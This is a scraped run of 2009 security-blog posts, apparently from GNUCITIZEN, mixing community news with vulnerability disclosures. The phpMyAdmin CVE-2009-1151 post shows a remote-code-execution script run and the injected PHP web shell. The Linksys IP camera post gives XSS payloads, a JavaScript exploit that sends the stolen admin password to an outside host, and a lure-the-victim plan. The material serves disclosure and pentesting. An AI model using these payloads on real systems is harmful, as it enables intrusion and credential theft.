GNUCITIZEN Network

Websecurify Security Scanner v0.1 Sneak Peek

noreply@blogger.com (pdp) — Thu, 02 Jul 2009 11:00:00 -0700

No comments! It should be ready soon!

CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept

Tue, 09 Jun 2009 12:03:13 -0700

I couldn’t find any public PoC/exploit for this phpMyAdmin vulnerability, despite it being a serious bug affecting a popular open-source project.

I think this vulnerability is a nice reminder that it’s still possible to perform remote command execution these days without relying on SQL injection (i.e.: xp_cmdshell) or a memory corruption bug (i.e.: heap overflow).

All the documentation you need is in the script comments. I recommend you to go through it, before you actually run the script.

After reading the public advisory and patched code, and playing around for a while, I managed to have a working PoC bash script. The script will allow you to remotely run shell commands and PHP code against vulnerable targets. Although in principle the vulnerability sounds quite simple, it actually took me a while to go from advisory to working attack code.

I’m providing the script with the hope that it will help pentesters and security researchers. Please only test the script against your own systems, or systems you have been given permission to pentest! Don’t be evil, it’s not worth it.

Demo

$ ./phpMyAdminRCE.sh
usage: ./phpMyAdminRCE.sh 
i.e.: ./phpMyAdminRCE.sh http://target.tld/phpMyAdmin/ $ ./phpMyAdminRCE.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/phpMyAdminRCE.sh.9217.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.: http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/ http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo(); please send any feedback/improvements for this script to unknown.pentester gmail.com $ curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
total 96
drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin
drwxr-xr-x 3 root root 4096 May 6 10:01 boot
lrwxrwxrwx 1 root root 11 Oct 12 2008 cdrom -> media/cdrom
drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev
drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc
drwxr-xr-x 3 root root 4096 Oct 18 2008 home
drwxr-xr-x 2 root root 4096 Jul 2 2008 initrd
[partial output removed for brevity reasons]

Contents of /config/config.inc.php after our evil code has been successfully injected (injected code shown in bold):

 * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $ * Date: Tue, 09 Jun 2009 14:13:34 GMT */ /* Servers configuration */
$i = 0; /* Server (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo
'';system($_GET['c']);echo '';}if($_GET['p']){echo
'';eval($_GET['p']);echo '
';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root'; /* End of servers configuration */ ?>

Thanks

I’d like to thank Greg Ose for discovering such a cool vuln and doing a nice writeup about the technical details! Also big thanks to str0ke for testing this PoC script and providing such useful feedback!

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious

Next Stage

Sat, 06 Jun 2009 02:09:09 -0700

We are moving forward slowly but surely. There is no need to rush though! In this post I just want to make several announcements and also mention a few important things.

Before you login for the first time in the network you need to reset your account.
The main HoH blog, the one this post is published on, is open for your contributions. If you want to post stuff please do let me know.
I was thinking to start a blog on HoH for random ideas for early feedback. I’ve been working on some stuff lately but they are not anywhere finished so a blog of that sort will give you the opportunity to share your work and get early feedback without the need to worry about the completeness of your work.
There were some ideas regarding setting up jabber and perhaps an asterix server. I think that these are great ideas and we should definitely do that. However, we need to make sure that we’ve got good policies in place and we harden the boxes before we proceed as the services are most likely going to be attacked once we open the doors.
Documents - there were suggestions on aggregating important documents or document templates that help when performing pentesting work, etc. This is a great idea. The question is how we are going to do that. The first idea is to start a blog and attach the documents per post. The second idea is to host the documents on a separate HoH domain, for example documents.houseofhackers.org or something similar. It is your call. Let’s discuss.

I think that HoH can turn into pretty cool place but we need to make it happen via small contributions from everybody. Let me know how do you feel about the points above.

Hacking Linksys IP Cameras (pt 5)

Fri, 05 Jun 2009 01:04:55 -0700

This article is a continuation of the following GNUCITIZEN articles: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3), Hacking Linksys IP Cameras (pt 4).

Mounting the filesystem on your workstation

There are many ways to mount the camera’s filesystem using the firmware binary. In this post, we’ll explain one way to mount firmware version v1.00R24 which is the latest available for the WVC54GCA model.

If you were to only use the firmware binary, things could be a bit difficult, as you don’t know the format of the binary at all. However, having the GPL firmware helps a lot as we’ll see next. I emailed Linksys back on Apr 23, 2009 informing them that although the GPL firmware was available on their site for other Linksys products, they hadn’t uploaded the one for the WVC54GCA camera. A few days later, on Apr 27, 2009, Linksys kindly made it available and has been available ever since (the file to download is wvc54gca_v1.00R24.tgz).

Thanks to Lex Landa’s tips I was able to figure out the parameters required to mount the firmware binary, by analysing the data contained in the ./scripts/wvc54gc_usa_english/combine.cfg file which is included with the GPL firmware:

size = 00400000
file = WVC54GCA.bin
f1_name = loader
f1_start = 00000000
f2_name=loader.ver
f2_start=00007FFE
f3_name=kernel
f3_start=00020000
f4_name=filesystem
f4_start=000E0000
f5_name=PID
f5_start=003FFFB2

I simply focused on the kernel and filesystem parameters. The previous settings show that then kernel starts at 0×20000 (131072 bytes / 128 KB), and the filesystem starts at 0xE0000 (917504 bytes / 896 KB). In order to start dd reading at 0xE0000, we need to keep 7 chunks of 131072 bytes. i.e.:7*131072=917504 bytes=0xE0000 (the position we want)

$ dd if=DYFF08-402-1024.bin bs=131072 of=fs.img skip=7
25+0 records in
25+0 records out
3276800 bytes (3.3 MB) copied, 0.019424 s, 169 MB/s

We then verify that our image file is a valid squashfs filesystem:

$ file fs.img fs.img: Squashfs filesystem, little endian, version 3.0, 2216311 bytes, 475 inodes, blocksize: 65536 bytes, created: Fri Nov 9 03:58:52 2007

A finally mount it on our hardrive:

$ sudo mkdir /mnt/test
$ sudo mount -t squashfs fs.img /mnt/test -o ro,loop
$ ls /mnt/test/
bin dev etc lib mnt proc root sbin tmp usr var

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious

Simple and Obvious

Wed, 03 Jun 2009 08:23:15 -0700

When we see something that is simple and obvious we automatically assume that we can reach the same idea because after all it is simple and obvious. However, simple and obvious concepts are hard to come up with.

Do not ignore the simple and the obvious. Some of the greatest things ever invented are quite simple and rather obvious but nevertheless great and irreplaceable.

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious

Microsoft Motion Control – The Future is Now

Wed, 03 Jun 2009 07:37:41 -0700

The following is a conceptional video from Microsoft regarding their motion control system for XBox.

It is a conceptional video but there are some developments towards this future today. Tomorrow I will post a more realistic video, which shows the motion control in action.

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious

Micro Communities

Thu, 28 May 2009 07:05:14 -0700

I think that we are at the verge of another online change. We are going from hyper global communities, to ultra local and even micro communities.

Global communities are places such as Facebook, Twitter, MySpace and all other social networks which sole purpose is to get as many users on board as possible. They are doing well but have become significantly less helpful in the last couple of years. In other words, people find them too intrusive, to globalized and subjective to abuse. People add friends as maniacs for no apparent reason apart form increasing their rank and apparently popularity level – a number which often means nothing to anyone.

As a result of all of this, we see the emergency of hyper local communities where real relationships can be made; micro communities designed around very specific purposes with clearly defined goals. These communities matter as they are real. They are small but sometimes quite significant and influential.

Needless to say, hyper local and micro communities are more secure and less subjective to abuse. Simply put, when people know each other quite well a lot of technological and social related problems such as spam, fake identities, etc., become non-issues. They simple disappear. This is an interesting side-effect which worths further exploration.

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious

Building the Community from Scratch

Thu, 28 May 2009 06:40:23 -0700

We are building the community pretty much from scratch: slowly but surely. There are some great ideas currently being generate and I hope we can make them happen soon.

Here is a list of a few ideas that I personally would like to see happen around HoH:

Video blog - list of public domain videos on security, etc; could turn into a dedicate vlog in the future
Podcasts - there was a lot of interest in dedicate HoH podcast. I am not in particular very good at this so everyone who is willing to help, please let us know.
Professional Materials - we really want to keep this network as clean and professional as possible. This means, that we are going to have specialized sections for training, pentesting and more, dedicated to infosec professionals.

So what do you say? Can we do it?

Information Gathering at its Greatest!

noreply@blogger.com (t3hmadhatt3r) — Tue, 19 May 2009 16:33:00 -0700

There is a tool I've found recently that is purely genius and very innovative. It is called Maltego and is a information gathering tool that uses backends and social sites like facebook, twitter, blog post and more to gather information based on the information you give it and what searches you preform. The tool will bring back a graph based search results pulling up everything it could find on the subject whether it be name, domain, email, dns servers, linked sites and much, much more! This tool is a must have for enumeration and the great part is the community edition is free! Download the community edition here. If you need some help getting started you can view the video tutorials here.

- "Information is power. Information is Maltego."

HoH Developers Group

Thu, 14 May 2009 14:42:37 -0700

This is just a quick announcement to let you know that we’ve started a group dedicated to people with a development background. The idea behind the group is not only to facilitate better communication between like-minded people but also to allow people with ideas to look for development talent to be used in projects.

Like everything in HoH, this is a community effort, i.e. a social experiment. If you want to become member of the new HoH initiative, please let us know via our contact page.

World of Warcraft and Social Media Success

Mon, 11 May 2009 11:54:22 -0700

Mashable is running an interesting article today titled 6 Things World of Warcraft Can Teach You About Social Media Success. It is about the life lessons the author of the article learned while playing WoW.

I took the courtesy to summarize them all here but pay a tribute to mashable by visiting their website first.

The Lessons

Success requires constant dedication – To succeed, you need to put in time and dedication.
It’s important to strategize your communication – If you don’t communicate effectively and clearly who you are and what you want no one will listen.
Set an objective and develop a strategy – Do not attempt to utilize social media without any specific objective or idea on how to be successful. You will fade away because you didn’t try to participate actively in the community or just didn’t know how.
It’s about networking – The people you connect with are incredibly important. It can mean the difference between success and failure.
Join new services, create new lines of communication – You should always be looking to create new lines of communication and new people to interact with. Rely on these people to educate and enlighten you. Expand your horizons by trying out new things in social media.
Earn other people’s trust – People won’t trust you until you can show them that you are to be trusted. Enough charlatans exist that you have to prove your value first before earning respect.

All of this reminds me of something I wanted to do for long, long time. Let me explain. In my high school years me and my friends used to organize late evening StarCraft tournaments – nothing too obsessive, two games max per day and no more than 1-2 hours long. We used to do these tournaments for a couple of months and it was then when I noticed similarities between the strategies involved in the game and the things that we do in real life. I very rarely play strategy games these days but I’ve always wanted to summarize in a blog post or something my conclusions from my experience when I used to play.

I guess now I have an incentive to finally sit and do it.

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious

Why Tribes, Not Money or Factories, Will Change the World

Mon, 11 May 2009 10:59:37 -0700

Seth Godin argues the Internet has ended mass marketing and revived a human social unit from the distant past: tribes. Founded on shared ideas and values, tribes give ordinary people the power to lead and make big change. He urges us to do so.

If you watch the video you will spot the Kindle sell-out but it is interesting presentation nevertheless. Actually, I listened to (yes audio version) of Seth’s book called Tribes and I found the whole idea quite fascinating but a bit off the ground.

See the video. You might get inspired to start your own tribe.

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious

Breaking Into a Home With an iPhone

Mon, 11 May 2009 04:27:16 -0700

This is going to be one of these quick posts which just makes you think what the information security landscape will be like in 5 years. Before I move on with my commentary, here is a video which is essential for you to watch.

Got the idea? No! Let me explain. What you see in the video above is an application for the iPhone which gives you detailed characteristics of properties (houses) in USA. You can either search the map or just use your GPS coordinates to get information such as price of the house, number of floors, number of rooms, pictures taken from inside the house if the house was part of any register (letting agencies etc.) before you moved in, and other interesting information.

This is the kind of information gathering you see only in the movies. I won’t be surprised if future versions of these kind of applications can pool even essential blueprints which show not only how the house was constructed from architectural point of view but also show the power and gas grids and perhaps even any other wiring such as telephone, coaxial, etc.

All of this information is also available through easily accessible APIs. Perhaps these APIs are not publicly known but anyone who can run a sniffer most certainly can get hold of the URLs and their formats. Now mash this APIs with any other tool such as one that correlates IP address to physical location (not very accurate btw) or better yet a wardriving tool and you have a infowar machine in your pocket that will make any criminal organization proud of.

This is the main purpose of my Web2.0 talk/research from two years ago. Back then I made a very simple analogy which I would like to bring once again. When the email was invented nobody even suspected that it will be used for things such as spam and malware. That was something unimaginable. Today spam is the fastest growing criminal industry and malware delivered over email is the most successful one. In summary, we cannot foresee how a technology will be used/abused. That depends on the imagination of the people.

The same goes for the Web2.0 meme. The more we use it, the more ways we will find to abuse it. However it is also important to say that the more we use it the more accustomed we will become to it. Therefore, when the shit hits the fan there will be very little that we can do.

The reason I am bringing this up is not because I would like to start even more FUD around the Web2.0 mem but it is time for security aware people to stop looking into the technical aspects and start thinking in terms of technologies that affect normal people. Sometimes, we just lack the realism and we fail to spot the obvious problems.

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious

The Reason to Focus on Simplicity

Sun, 10 May 2009 07:38:49 -0700

I wrote about the importance of simplicity before but here is another reason why you should believe me. :)

Keep this in mind the next time you design a service or a product. The simpler the better.

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious

Social Media in Plain English

Sun, 10 May 2009 07:17:41 -0700

Confused information security folks (but not only) can find this video quite interesting.

What I liked the most about this video is that the authors clearly explain that social media is first of all the collective contributions of ordinary people through blogs, wikies, podcasts and other social instruments combined with the efforts of other individuals and organizations who are willing to aggregate, organize and help facilitate community feedback.

By the people, for the people!

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious

Bill Gates Facebook Page

Sun, 10 May 2009 02:11:40 -0700

Funny Sunday morning stuff:

Steve Jobs and St. Peter are also there.

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious

Did You Know 3.0

Sun, 10 May 2009 01:52:33 -0700

In my opinion, some of the facts presented in this video are questionable. There isn’t an easy way to verify them. Nevertheless, the footage is quite interesting and informative.

3.0 for 2008 – Newly Revised Edition Created by Karl Fisch, and modified by Scott McLeod; Globalization & The Information Age. It was even adapted by Sony BMG at an executive meeting they held in Rome this year. Credits are also given to Scott McLeod, Jeff Brenman.

The reason why I am posting this is to stress that information has become an important part of our lives. Today we are information hungry. Tomorrow… who knows? I suspect that we will get fed up with the world and escape for the simpler life. You might want to check my previous article on the same subject.

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious

The Revolution of the Internet in 1993

Sat, 09 May 2009 12:39:47 -0700

A video from 1993 when the Internet was just making its premiere in the world.

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious

Extensions at War

Sun, 03 May 2009 01:37:28 -0700

Two of the most popular Firefox extensions are at war, fighting for their own piece of land. More examples will follow.

Oh yes, the digital battlefield is taking unusual shapes. The latest manifestation of cyber warfare is a conflict between the Adblock Plus and the NoScript extensions. The story goes that NoScript used some JavaScript tactics and, of course, some obfuscations in order to cripple the Adblock Plus functionalities. This attack was a response to Adblock Plus blocking NoScript ads which you see when you upgrade the extension, which as you know happens quite regularly, don’t know why.

The conflict seems to be resolved now to one degree or another but it is interesting to observe the whole situation and also draw important conclusions. Therefore, I’ve got several points I would like to bring to the table:

More examples of similar nature will follow. Keep an eye on Facebook, Apple AppStore, Firefox and other platforms that allow 3rd-party components to be displayed, downloaded and executed.
As I mentioned before, a malicious piece of JavaScript code (even an obvious obfuscation) can be quite easily smuggled into harmlessly looking Firefox extensions. If I may speculate, the situation is the same for other similar platforms.
Unless platform vendors do something about it, they could become the next hot spot for all sorts of interesting malware.

It is also very interesting to see the extend to which extension developers will go in order to protect their userbase. After all, larger userbase equals more money. And with more people looking to quickly cache in, the battlefield is truly changing for better or worse.

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious

Blogs, Groups and Forums

Sat, 02 May 2009 04:10:15 -0700

Unlike the old platform, the new platform will provide much more purpose. It is yet to be decided how all of the feature will work but it is very likely that we will drop the support for forums and emphasize the groups feature and more specifically the group wire where members of individual groups can communicate. Additionally, we are going to allow creation of more purposeful blogs where one or several members can communicate their ideas and get community and external feedback. It is yet all of this to be decided so please join us at hoh discussion group.

Welcome to HoH v2

Fri, 01 May 2009 10:30:42 -0700

Hello House of Hackers V2. I like you!

Exploit Sweatshop

Thu, 30 Apr 2009 05:04:47 -0700

When I was playing/introducing the partial disclosure practice an year and something ago, I did get contacted by numerous dodgy characters willing to buy yet undisclosed vulnerabilities for substantial amount of money.

Of course, requests of that nature were kindly ignored. I couldn’t believe that someone was willing to give me so much money for something I virtually spent 2-3 hours maximum to produce.

Later on, during the CONFidence 2008 event in Krakow I met a bunch of people who claimed that they already sell exploits to various UK companies and the figures that they were making were outstanding. To give you a clue, given the pound dollar difference at that time, you could have made 6 times more than what ZDI and other similar programs can offer you for a top range exploit. This is already better than a top salary in UK.

Same year, different event… I saw an interesting presentation by Robert McArdle from Trend Micro. The presentation was titled Fighting web Based, Profit-Driven Threats. On one of his slides, Robert commented that cybercrime is becoming more profitable than the drug cartels. Perhaps you wont be able to make as much money from carding as you might expect but you can do quite well selling visualized stuff, such as exploits and exploit toolkits.

Present times, DojoSec Monthly Briefings… Matthew Watchinski from Sourcefire VRT talked about a PDF 0day spreading around Xmas time. The exploit took a couple of good months for Adobe to fix it. The author sold it for 75K to a unknown 3rd-party in China according to Matthew. The vulnerability was also relatively easy to find and required very little experience to exploit.

All of this leads to the very obvious conclusion which is that at present times cybercrime is a flourishing industry. Soon, there will be even more recruits coming to join the dark-side forces of the cybercrime cartels. They will do it for the money!

No more free bugs you say. I say that you are leading people to become the next generation of cyber menace. Perhaps you forgot that the information security community was built on and thrived because of a simple but fundamental principle: knowledge must be free.

Sell The Bugs

Regardless how good these figures may sound to you, you need to take a step back and think really well what you are getting into. Here are a few points that you need to consider before selling exploits:

Cybercrime is not a joke – If you get caught selling exploits to a dodgy 3rd-party you may end up with a prison sentence longer than the sentence of a child molester. If you live in US or UK you could be charged and treated as a terrorist which will completely destroy not only your life but the life of your closes people.
TAX man problems – Oh Yes! Unjustifiable incomes could get you in trouble with the TAX man. The TAX man will hunt you and hurt you.
Broken legs and other broken parts of the body – You have no idea to whom you are selling to. Tomorrow you may wake up with broken legs and twice as poorer as the day before.
Even worse – People will kill for a lot less than 75K. Keep that in mind.

In my humble opinion, exploit brokerage is a risky business. There is an unquantifiable risk associated with this practice and that is only due to the high price of exploits which are sold today.

Exploit Sweatshop

Nevertheless, it is just silly to believe that no one is producing and selling exploits in a large scale. Do you remember the numerous gaming sweatshops which sprung up like wild mushrooms after the recent heavy rains in 3rd-world countries? I recall seeing a documentary on a typical day in a Chinese WoW sweatshop. I remember I saw a room full of almost naked people, numerous PCs hooked up into a gigantic DIY network spreading across the entire floor. Most of the WoW accounts were fully automated, running from virtualized platforms.

The aim was simple: a) develop many characters in a semi-automated fashion by killing small animals and other things around the WoW world and b) sell the characters plus other artifacts to western buyers for a substantial amount of money. All of this can be achieved for as little as $70 a month per person. This is a remarkable business model which works extremely well.

Similarly, all you need is a bunch of programmers from India, China, or Eastern Europe to code up fuzzers and run them against as many software products as possible. At the end of the day buffer overflow exploits a relative easy to detect. All you need is a crash caused by putting far too many 0×41 in a buffer. The crash is already an indication that something is wrong. It requires a bit of manual work to figure out whether the crash is exploitable. From personal experience, and by looking into the work of my peers, it takes approximately 10 days to develop a crash into an exploit. Most of the times, the exploitability factor of a crash is apparent and therefore no time needs to be wasted. Other times, a crash can be archived for future investigation when it could become exploitable given it meets the necessary conditions.

Perhaps you can do all that by paying someone as little as $70 a month as it is the case with WoW sweatshops. That is 3 times less than what I am paying for just hosting. Therefore, I most certainly can afford to hire 3-4 people right now and even double their salaries, but let’s do the maths:

# average exploit price: $5000
# number of people to hire: 5
# average monthly salary: $100
# job specs: write fuzzers 5 * 100 = $500 # a month expenses
5000 / 500 = 10 # months worth of work

Heck, I can even put this bill on my credit card and pay as little as $50 a month. The chances that I will sell an exploit for $5K in the next 10 months are pretty high. $5K is only if I go with a legitimate company. I can probably make 6 times more by selling it to a dodgy 3rd-party. The only thing I need to worry about is the risk.

Some Final Words

Finally, I know that a lot of people are into the security business because of all the romanticism and the myths surrounding the hacker figure. Things look different once you become the hacker and your day job and lifestyle are surrounded by hacking and breaking into systems of any sort. There is nothing romantic about it.

So, don’t get into trouble for the wrong reasons. If you are young and you need advice what to do with your career, contact us or contact any one who has been into this industry long enough to give you a good and sensible advice. Just don’t jump onto the No free bugs! bandwagon.

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious

Jeriko Group and Source Code Repository

Mon, 27 Apr 2009 23:50:39 -0700

With this post I would like to inform you that Jeriko moved in its own source code repository which you will be able to find here. There is also a discussion group here, if you feel like using it.

The version inside the new code repository is very different from the version you’ve seen before. The main difference is that while the old version is basically a collection of scripts, the new version implements its own shell (wrapper around bash) which does the heavily lifting and also introduces some funky programming mechanisms. For example, now you can create jeriko scripts like this:

#/usr/bin/env jeriko
# do my jeriko commands here
foreach-input | add-targets
generate-scan-batch | run-in-parallel

This is perhaps the simplest possible script you can write but you see that the jeriko shell could turn into a quite powerful feature. The shell is also a good starting point for many penetration testing jobs as it does some environment checking and preconfigures some defaults for you. The other good news is that you don’t have to learn a new programming language. Your bash skills are good for jeriko too.

Just keep in mind that jeriko is merely an experiment. However, I realize that it has already become quite useful for some people. So, if you enjoy playing with bash scripts, and you you feel adventurous, please join us and make this project happen.

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious

Hacking Linksys IP Cameras (pt 4)

Fri, 24 Apr 2009 20:28:38 -0700

This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3).

There are two types of vulnerabilities I will be releasing today: disclosure of credentials in client-side source code and multiple XSS.

Disclosure of Credentials in Client-side Source Code

As a consumer of embedded products, I find highly frustrating to see how many devices’ web interfaces return passwords back to the browser within HTML source code. I’ve also seen similar problems in some corporate appliances, but is not such as common problem within the enterprise realm.

Visiting the “change admin password” page:

/adm/file.cgi?next_file=pass_wd.htm

Causes the current admin password to be returned (just view the source code with your browser):

Visiting the "Wireless Security Page":

/adm/file.cgi?next_file=Wsecurity.htm

Causes the Wi-Fi WEP/WPA/WPA2 encryption key to be returned to the browser:

Obviously this is bad news, as it means that every time the aforementioned pages are visited, credentials travel the clear (the WVC54GCA IP camera doesn't have SSL/TLS support).

Now, I know there are people out there who might find these types of issues not worth fixing. The following is the thinking behind their reasoning.

In the case of the admin password disclosure, some people would argue that this issue wouldn't make a difference security-wise, since the camera uses basic authentication which transmits credentials in the clear (base64 encoding) anyway.

In the case of the wireless encryption key disclosure, some individuals point out that if you can sniff the Wi-Fi encryption key, it means that either 1) you're already part of the wireless network which means you must already know the key, or 2) you are part of the network via an ethernet connection which means that you don't need the wireless key at all.

So why fix these issues then? Well, think of client-side attacks for instance. If you keep reading I'll show you how you can (for instance) use XSS to steal the admin password from the aforementioned page. If the admin password wasn't returned by the web interface, this attack would not be possible, despite basic authentication being used by the camera.

Several XSS bugs

Yes, XSS is the roach of the Internet, it's everywhere and we can't seem to be able to get rid of it! Of course, Linksys IP cameras are no exception. Finding XSS vulns requires virtually no skills (unless you are trying to bypass a strict filter logic). Also, hunting for XSS vulns can be kind of boring. As pdp usually says, "it's not finding XSS bugs which is interesting, but what you can do with it". I couldn't agree more.

Boring PoCs:

/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E

/img/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E

/adm/file.cgi?next_file=%3Cscript%3Ealert(1)%3C/script%3E

/adm/file.cgi?todo=xss&this_file=%3cscript%3ealert(1)%3c/script%3e

XSS bug #1 works regardless of the authentication state of the victim user. The rest do require the victim user to be logged-in for the injected JS to run within the context of the camera's domain sandbox.

As you can see in the first two XSS vulns, we use img tags, rather then script tags, due to closing script tags being filtered. Once again, the developers have chosen to perform filtering against some parameters, albeit poor filtering.

Admin Password theft XSS PoC

The following is the PoC exploit which steals the admin user's password.

// evil.js : malicious JS file, typically located on attacker's site
// payload description: steals Linksys WVC54GCA admin password via XSS
// tested on FF3 and IE7
// based on code from developer.apple.com
function loadXMLDoc(url) { req = false; // branch for native XMLHttpRequest object if(window.XMLHttpRequest && !(window.ActiveXObject)) { try { req = new XMLHttpRequest(); } catch(e) { req = false; } } // branch for IE/Windows ActiveX version else if(window.ActiveXObject) { try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) { try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { req = false; } } } if(req) { req.onreadystatechange = processReqChange; req.open("GET", url, true); req.send(""); }
}
// end of loadXMLDoc(url) function processReqChange() { // only if req shows "loaded" if (req.readyState == 4) { // only if "OK" if (req.status == 200) { // dirty credentials-scraping code var bits=req.responseText.split(/\"/); var gems=""; for (i=0;i

 http://192.168.1.115/adm/file.cgi?next_file=%3cscript%20src=http://evil.foo/evil.js%3e%3c/script%3e
 If you capture the traffic while testing the exploit against yourself you will see the admin login and password being sent to google.com:
 
 Attack Requirements
 In order for this exploit to work, the camera admin user must be logged in when the attack occurs. This means that a bit of social engineering is required. For instance, the attacker could setup a forum to "help" users of the WVC54GCA camera by providing tips, FAQs, etc. If the attacker is serious he could use black hat SEO and ad campaigns such as Google AdWords to attract Linksys camera users to visit the site containing the malicious XSS URLs. You get the idea!
 Testing Info
 All Disclosure of Credentials and XSS vulnerabilities successfully tested on:

WVC54GCA
Firmware V1.00R22 and V1.00R24 (latest available as on 23rd April 2009)
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



Hacking Linksys IP Cameras (pt 3)
Wed, 22 Apr 2009 17:52:28 -0700
This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2).
 Unlike the previous two vulnerabilities I released, the vulnerabilities I’m releasing in this post are perhaps not so useful to break into the device as you need access to the admin account to exploit them. Nevertheless, these vulnerabilities might be useful for users who want to hack their Linksys IP cameras for modding purposes, rather than being used by an attacker aiming to crack into someone else’s camera.
 Two directory traversal vulnerabilities
